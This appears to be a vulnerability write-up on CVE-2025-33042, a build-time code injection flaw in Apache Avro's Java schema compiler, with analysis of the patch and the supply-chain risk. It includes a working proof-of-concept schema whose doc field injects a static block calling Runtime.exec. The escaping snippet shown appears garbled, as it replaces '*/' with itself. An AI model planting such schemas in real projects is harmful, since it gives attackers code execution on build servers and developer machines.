Schema to Shell: Unpacking the Apache Avro Code Injection Vulnerability
Feb 14, 2026·6 min read·3 visits
Executive Summary (TL;DR)
The Apache Avro Java SDK failed to sanitize schema metadata before generating Java source code. An attacker can craft a malicious schema that, when compiled by a developer or build server, injects and executes arbitrary Java code (RCE). Fixed in versions 1.11.5 and 1.12.1.
Apache Avro, the serialization backbone of the big data ecosystem, contained a critical code injection vulnerability in its Java SDK. The flaw allowed attackers to weaponize Avro schemas—typically benign JSON definitions—to inject arbitrary Java code during the compilation phase. By manipulating metadata fields like documentation or annotations, a malicious schema could trick the `SpecificCompiler` into generating a Trojan horse Java class. This effectively turns a standard build process into a Remote Code Execution (RCE) vector, threatening developer workstations and CI/CD pipelines alike.
The Trojan Schema
In the world of software engineering, code generation is the lazy developer's best friend. We love tools that take a definition file and spit out thousands of lines of boilerplate so we don't have to. Apache Avro does exactly this: you feed it a JSON schema defining your data, and it hands you a pristine Java class ready for serialization. It’s the plumbing behind Kafka, Hadoop, and countless microservices. But here is the catch: we implicitly trust that the generator isn't going to betray us.
CVE-2025-33042 creates a scenario where that trust is fatal. The vulnerability resides in the SpecificCompiler, the component responsible for translating those innocent-looking JSON schemas into executable Java source code. The compiler assumed that the metadata inside a schema—specifically documentation strings and custom annotations—was just text. It didn't expect that text to contain Java syntax.
This is a classic 'injection' vulnerability, but with a twist. It's not happening at runtime when the application handles a request; it's happening at build time. This means the victim is the developer running mvn compile or the CI/CD server building the release artifacts. It transforms the build pipeline itself into the attack surface, allowing an attacker to execute code with the privileges of the build user—often a highly privileged account with access to signing keys and cloud credentials.
The Logic Flaw: Blind Trust
The root cause is embarrassingly simple: string concatenation without sanitization. The SpecificCompiler uses Apache Velocity templates to construct the Java files. When it encounters a doc field in the Avro schema, it blindly pastes that content into a Javadoc comment in the generated file. When it sees a javaAnnotation property, it pastes it right above the class or field declaration.
Consider the Javadoc vector. The compiler attempts to generate code that looks like this:
/** [INSERT_DOC_HERE] */
public class User ...The developers forgot that in Java, comments have a terminator: */. If an attacker supplies a documentation string that includes */, they can prematurely close the comment block. Once the comment is closed, the compiler continues writing whatever text follows as if it were valid code. It's the Java equivalent of SQL injection's classic ' OR 1=1; --.
The same logic applied to the javaAnnotation field. The compiler expected a valid annotation like @Deprecated or @Nullable. It did not anticipate a string like @MyAnnotation public static void main.... By failing to validate that the input was actually a valid annotation and nothing more, the compiler allowed the schema to redefine the structure of the generated class entirely.
Source Code Forensics
The fix provided in commit 84bc7322ca1c04ab4a8e4e708acf1e271541aac4 reveals the severity of the oversight. The maintainers had to introduce strict validation and escaping where previously there was none. Let's look at the changes in SpecificCompiler.java.
The Annotation Fix:
Previously, javaAnnotation was accepted as-is. The patch introduces a strict regex pattern VALID_AS_ANNOTATION that ensures the string conforms to Java's identifier rules. If the input contains weird characters (like curly braces or semicolons that would denote code blocks), the compiler now rejects it.
// The new sheriff in town
private static final Pattern VALID_AS_ANNOTATION = Pattern.compile(
String.format("%s(?:%s)?", PATTERN_IDENTIFIER, PATTERN_PARAMETER_LIST));The Javadoc Fix:
For the documentation vector, they introduced a new utility method escapeForJavadoc. This method scans the input string specifically for the */ sequence. If found, it breaks the sequence up using HTML entities, ensuring the Java compiler sees it as text rather than a syntax token.
// Before: return this.doc;
// After:
public static String escapeForJavadoc(String doc) {
if (doc == null) return null;
// Replaces */ with */
return doc.replace("*/", "*/");
}This change forces the malicious payload to remain trapped inside the comment block, rendering it inert. It is a text-book example of output encoding: never write user-supplied data to a sink (in this case, a source file) without encoding it for the context.
Breaking Out of the Box
To exploit this, an attacker doesn't need to touch the production server. They just need to get a malicious .avsc file into the project's source tree. This could be done via a Pull Request (hiding the exploit in a large schema change) or by compromising a schema registry that the build process polls.
Here is how a researcher—or an adversary—would construct the payload. We want to execute calc.exe (or rm -rf /) when the class is loaded. We use the doc field to break out of the comment and inject a static initialization block.
The Malicious Schema:
{
"type": "record",
"name": "TrojanRecord",
"doc": "*/ static { try { java.lang.Runtime.getRuntime().exec(\"calc.exe\"); } catch(Exception e) {} } /*",
"fields": []
}The Generated Code (Vulnerable):
When mvn compile runs, the SpecificCompiler generates TrojanRecord.java:
/** */ static { try { java.lang.Runtime.getRuntime().exec("calc.exe"); } catch(Exception e) {} } /* */
@org.apache.avro.specific.AvroGenerated
public class TrojanRecord extends ...Notice what happened? The leading /** from the template matches with the */ at the start of our payload. Then our static block runs. Finally, the trailing /* from our payload matches with the */ from the template, effectively commenting out the garbage at the end. When the Java compiler picks this file up in the next step of the build process, it compiles valid bytecode that executes the command immediately upon class loading.
The Supply Chain Nightmare
The impact of CVE-2025-33042 extends beyond simple Remote Code Execution; it is a supply chain vulnerability. In modern development, schemas are often shared assets. A central team might define the User schema, and twenty downstream microservices consume it to generate their POJOs.
If an attacker can poison that central schema definition, every single downstream service that updates its dependencies and rebuilds will be compromised simultaneously. This is the 'write once, pwn everywhere' model. The code executes during the build, which often takes place in environments with elevated privileges—access to private artifact repositories, cloud deployment keys, and signing certificates.
Furthermore, because the malicious code is baked into the generated Java class, it persists into the final JAR artifact. If the static block logic is subtle (e.g., opening a reverse shell only on a specific date), it could be deployed to production servers, turning the application itself into a backdoor. This bypasses traditional SAST tools because the malicious code isn't in the source repository—it's ephemeral, existing only in the target/generated-sources directory during the build.
Official Patches
Fix Analysis (1)
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:LAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Apache Avro Java SDK Apache Software Foundation | <= 1.11.4 | 1.11.5 |
Apache Avro Java SDK Apache Software Foundation | 1.12.0 | 1.12.1 |
| Attribute | Detail |
|---|---|
| CVE ID | CVE-2025-33042 |
| CVSS v3.1 | 7.3 (High) |
| CWE | CWE-94 (Code Injection) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
| Impact | Remote Code Execution (Build-time or Run-time) |
| Fix Versions | 1.11.5, 1.12.1 |
MITRE ATT&CK Mapping
The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.